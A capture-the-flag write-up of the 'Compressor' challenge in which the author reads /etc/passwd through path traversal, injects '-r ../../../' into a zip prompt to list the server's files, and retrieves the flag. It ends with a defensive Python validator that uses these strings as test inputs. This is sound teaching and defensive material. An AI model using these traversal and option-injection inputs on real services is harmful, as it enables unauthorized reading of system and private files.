Tags: misc 

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/compressor/1.png)

So we are given an endpoint we can `netcat` into and it presents us with the following:

```shell
Compressor
[*] Directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB
Component List:
+===============+
| |
| 1. Head ? |
| 2. Torso ? |
| 3. Hands ? |
| 4. Legs ? |
| |
+===============+
[*] Choose component: 1
[*] Sub-directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB/Head
Actions:

Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
```

Let's try reading an artifact and passing it something they didn't intend:

```shell
[*] Choose action: 3
Insert name you want to read: ../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
...
ctf:x:1000:1000:1000:/home/ctf:/bin/sh
```

Great, so we can read arbitrary files!

```shell
Actions:

Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit

[*] Choose action: 1
Insert name: ../
Insert content: #!/bin/bash
Traceback (most recent call last):
File "/home/ctf/artifacts.py", line 104, in
create_file()
File "/home/ctf/artifacts.py", line 74, in create_file
f = open(fname, "a")
IsADirectoryError: [Errno 21] Is a directory: '../'
Actions:

Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit
```

So my first thought after this was that, since we can seemingly access file paths indiscriminately, let's try zipping them all up together:

```shell
[*] Choose action: 4
Insert .zip: test.zip
Insert : test
Insert : -r ../../../
adding: test (stored 0%)
adding: ../../../ (stored 0%)
adding: ../../../ctf/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Head/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Hands/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Torso/ (stored 0%)
...
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Torso/ (stored 0%)
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Legs/ (stored 0%)
adding: ../../../ctf/artifacts.py (deflated 63%)
adding: ../../../ctf/clear.py (deflated 32%)
adding: ../../../ctf/flag.txt (stored 0%)
Actions:
```

And since it pastes the output, we now know where the flag is!

```shell
Create artifact
List directory (pwd; ls -la)
Read artifact (cat ./)
Compress artifact (zip .zip )
Change directory (cd )
Clean directory (rm -rf ./*)
Exit

[*] Choose action: 3
Insert name you want to read: ../../../ctf/flag.txt
HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}
```

`Flag: HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}`
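
The two inputs that worked above, `../../../../etc/passwd` for the read action and `-r ../../../` for the compress action, are a path traversal and an option injection. The following is an added example, not the challenge's `artifacts.py`: a sketch of the validation the service was missing, with hypothetical helper names (`resolve_inside`, `zip_argv`, `check`, `UnsafeName`) and assuming a POSIX host where `zip` is run without a shell.

```python
import os

class UnsafeName(ValueError):
    """A user-supplied name that must not reach cat/zip/open."""

def resolve_inside(workdir: str, name: str) -> str:
    """Return the absolute real path of `name`, which must live below `workdir`."""
    # Reject empty names, NUL bytes, and anything a CLI tool would parse as an
    # option (the "-r ../../../" input from the write-up starts with "-").
    if not name or "\x00" in name or name.startswith("-"):
        raise UnsafeName(f"rejected name: {name!r}")
    base = os.path.realpath(workdir)
    # realpath collapses ".." and follows symlinks before the comparison.
    target = os.path.realpath(os.path.join(base, name))
    # commonpath compares whole components, so /work/Head2 is not inside /work/Head.
    if target == base or os.path.commonpath([base, target]) != base:
        raise UnsafeName(f"escapes working directory: {name!r}")
    return target

def zip_argv(workdir: str, archive: str, members: list[str]) -> list[str]:
    """Build an argv list for zip (to be run without a shell).

    There is no free-form options field: every operand is validated and passed
    as an absolute path, which can never start with "-".
    """
    out = resolve_inside(workdir, archive)
    return ["zip", out, *[resolve_inside(workdir, m) for m in members]]

def check(workdir: str, name: str) -> str:
    """Return 'ok' or the rejection reason for one input (demo helper)."""
    try:
        resolve_inside(workdir, name)
        return "ok"
    except UnsafeName as exc:
        return str(exc)

if __name__ == "__main__":
    import tempfile
    work = tempfile.mkdtemp()  # constructed stand-in for the Head sub-directory
    # Constructed inputs: one benign name plus the two strings used in the write-up.
    for name in ["test", "../../../../etc/passwd", "-r ../../../"]:
        print(f"{name!r:32} -> {check(work, name)}")
```
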

Original writeup (https://newyork167.github.io/infosec/cyber%20apocalypse%202022/misc/2022/05/19/cyber-apocalypse-2022-writeups-misc-compressor.html).